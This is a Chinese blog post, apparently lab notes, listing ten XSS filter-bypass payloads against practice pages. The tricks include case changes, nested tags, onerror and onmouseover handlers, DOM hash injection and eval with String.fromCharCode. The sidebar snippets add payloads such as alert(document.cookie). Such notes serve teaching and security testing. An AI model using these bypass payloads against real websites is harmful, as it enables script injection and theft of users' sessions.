XSS的绕过技巧

最新推荐文章于 2024-07-03 16:24:19 发布
最新推荐文章于 2024-07-03 16:24:19 发布
阅读量443 收藏 9
点赞数 12
分类专栏: 网络安全 漏洞 文章标签: 网络安全 xss 漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_76786857/article/details/135741344
版权

1、大小写绕过

http://target_sys.com/xss/xss04.php?name=<Script>alert(1);</Script>

2、属性多余

http://target_sys.com/xss/xss05.php?name=<script<script>>alert(1);</sc</script>ript>

3、转换标签

http://target_sys.com/xss/xss06.php?name=moon<img src=a οnerrοr=alert(1)>

4、禁用alert

http://target_sys.com/xss/xss07.php?name=<img src="1" οnerrοr="confirm('xss')">

5、js输出

http://target_sys.com/xss/xss08.php?name=moon";alert($a)//

6、js过滤输出

过滤单引号

http://target_sys.com/xss/xss09.php?name=moon';alert($a);//

7、dom输出

http://target_sys.com/xss/xss10.php?name=moon#<script>alert(1);</script>

http://target_sys.com/xss/xss10.php?name=moon#<script>alert(/xss/);</script>

hash 属性是一个可读可写的字符串,该字符串是 URL 的锚部分(从 # 号开始的部分)。

substring 从#开始截取后面的部分

8、urlxss

http://target_sys.com/xss/xss11.php/" οnsubmit="alert('1')

$_SERVER['PHP_SELF']

9、过滤特殊字符

php开启gpc之后

单引号(’)、双引号(”)、反斜线()与 NUL(NULL 字符)等字符都会被加上反斜线

http://target_sys.com/xss/xss12.php?name=<script>alert(1);</script>

http://target_sys.com/xss/xss12.php?name=<script>eval(String.fromCharCode(97,108,101,114,116,40,34,120,115,115,34,41,13))</script>

10、过滤大小号

http://target_sys.com/xss/xss13.php?name=moon' οnmοuseοver='javascript:alert(1)

廾匸0705
关注
  • 12
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
XSS绕过技巧总结
weixin_51802382的博客
10-22 2302
XSS绕过技巧 作者:白泽Sec安全实验室 前言 XSS是Web应用程序中常见的漏洞之一,网站管理员可以通过用户输入过滤、根据上下文转换输出数据、正确使用DOM、强制执行跨源资源共享(CORS)策略以及其他的安全策略来规避XSS漏洞。尽管现在有很多预防XSS攻击的技术,但Web应用程序防火墙(WAF)或自定义数据过滤器是目前使用比较广泛的安全保护技术了,很多厂商都会利用这些技术来抵御新型的XSS攻击向量 有些时候,通用的绕过技巧并不可行,这个时候我们就得观察缺陷点的周围环境,想想其它办法咯。“猥琐绕过”与通
XSS绕过waf
m0_52813136的博客
07-28 1213
XSS绕过waf靶机
XSS漏洞05】XSS通关大挑战
Fighting_hawk的博客
02-25 3965
1. 通过测试语句执行情况、网页源码: 1. 判断大小于号是否过滤与转义; 2. 判断单双引号是否过滤与转义; 3. 判断关键字是否过滤与转义; 4. 判断大小写是否转化; 5. 判断语句闭合方式。 6. 额外地,可以分析是否存在其他注入点。 2. 根据判断结果,灵活构造语句与利用绕过规则。...
XSS跨站测试代码大全
余韵悠扬
09-20 341
'>alert(document.cookie) ='>alert(document.cookie) alert(document.cookie) alert(vulnerable) %3Cscript%3Ealert('XSS')%3C/script%3E alert('XSS') %0a%0aalert(\"Vulnerable\").jsp %22%3csc
XSS绕过技巧
weixin_52501704的博客
02-10 3066
XSS绕过技巧
我的渗透笔记之XSS绕过技巧
热门推荐
xf555er的博客
03-03 1万+
1、单引号、双引号和尖括号之间的闭合。 有些标签例如,构造的payload应该为” >,那么组成的标签为<input value=""><script>alert(1)</script>" 2、尖括号被转义,利用注释符号和一些属性事件. 例如,构造payload为" οnclick=alert(1)//,组成的标签为<input value="" o...
XSS攻击绕过方法大全,XSS攻击技巧,收集100种绕过方法分享(2024最新)
白帽黑客八哥的博客
12-12 4909
尽管许多网站实施了输入过滤措施来防止跨站脚本(XSS)攻击,但在特定条件下,经过精心编码的脚本仍有可能实施XSS注入。本文旨在为专业的安全测试人员提供一个跨站脚本漏洞的检测指南。
【奇淫巧技】XSS绕过技巧
weixin_30578677的博客
06-07 992
XSS记录   1、首先是弹窗函数: alert(1) prompt(1) confirm(1)eval()   2、然后是字符的编码和浏览器的解析机制:     要讲编码绕过,首先我们要理解浏览器的解析过程,浏览器在解析HTML文档时无论按照什么顺序,主要有三个过程:HTML解析、JS解析和URL解析,每个解析器负责HTML文档中各自对应部分的解析工作。     首先浏览器...
xss绕过方法有哪些?XSS攻击绕过过滤方法技巧分享(xss绕过宝塔)
白帽子佳奇的博客
12-12 4132
XSS(跨站脚本攻击)绕过方法是一系列技巧,用来绕过目标网站的安全措施和过滤器,执行恶意的脚本。
XSS过滤绕过手法与加载payload
NZXHJ的博客
07-29 1808
关于各类XSS注入过滤的绕过手法,以及利用XSS平台加载注入payload讲解
记录几种XSS绕过方式1
08-03
本文主要记录了几种XSS绕过的方法,帮助开发者理解攻击者可能使用的技巧,提高网站的安全性。 1. 服务端全局替换为空的特性: 当网站的过滤机制将某些特定字符如"onerror"或"script"替换为空时,攻击者可以利用...
XSS.rar_XSS
09-22
- 利用零日漏洞:攻击者可能会发现新的、未被修复的安全漏洞,利用这些漏洞绕过现有的防护。 5. **防御XSS攻击的方法** - 对用户输入进行严格的验证和过滤,避免特殊字符的出现。 - 使用HTTP头部的Content-...
xss-lab全通关教程
05-07
XSS-lab的20个关卡中,你将依次接触这些类型,并学习如何构造有效的XSS payload,以及如何利用各种过滤和转义机制来绕过防护。例如,你可能会遇到如何在URL参数、表单提交或者cookies中隐藏和传递XSS payload的...
xss平台搭建源码,xss漏洞练习
06-03
</script>`,了解JavaScript的禁用策略以及如何绕过浏览器的安全机制。 3. 了解XSS过滤和防御机制,如输入验证、输出编码、HTTP头部的Content-Security-Policy等。 4. 实践利用XSS漏洞进行攻击,如钓鱼、会话劫持、...
xss_bypass_cookbook_4.0.pdf.zip_XSS
09-23
为了对抗这些高级攻击,开发者需要保持对最新XSS漏洞绕过技术的关注,并不断更新防御策略。同时,进行安全编码培训、使用自动化安全测试工具以及实施持续的安全审计也是必不可少的。 在阅读"XSS Bypass Cookbook ...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8319
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
什么是 XSS 攻击?如何防范
narukeu的博客
07-01 433
跨站脚本攻击(XSS)是一种常见的网络安全威胁,它允许恶意攻击者在受害者浏览器中注入并执行未经授权的脚本代码。这些脚本能够盗取敏感信息、操控网页内容或模拟用户行为,严重威胁用户数据安全及网站信誉。
XSS 攻击是什么?如何防护?
weixin_64684095的博客
07-02 285
跨站脚本攻击,是一种很常见的网络安全威胁。它允许攻击者在目标浏览器中注入恶意脚本代码。这些恶意脚本会执行多种非法操作。比如盗取你的 cookie,会话信息,篡改网页内容,重定向到别的恶意网站。控制浏览器的一些行为。严重危害了用户的数据安全。
ctfshow-xss(web316-web330)
最新发布
m0_72125469的博客
07-03 1106
web317讲解相当细致精致练习XSSweb316这道题估计陆陆续续弄了半天 因为xss可以说基本不会 还好最终彻彻底底明白了首先这道题是反射性xss 也就是必须点击某一个xss链接 才能达到xss效果这道题的意思就是 写一个祝福语生成链接发送给朋友 这个祝福语的位置就是我们实现XSS的位置已知:flag在BOT(程序,机器人)的cookie中并且 生成的链接后端BOT会每隔一段时间访问所以 要构造一个含有XSS的链接 使得管理员只要访问就能获取BOT的cookie。
第09篇:跨站脚本(XSS)备忘单-2019版1
08-03
"本文档是关于跨站脚本(XSS)的备忘单,由Portswigger公司的Web安全学院在2019年更新,旨在为渗透测试人员提供XSS攻击的各种方法,包括事件处理、协议利用、特殊属性、字符限制、编码技巧以及沙箱逃逸策略。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

廾匸0705

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值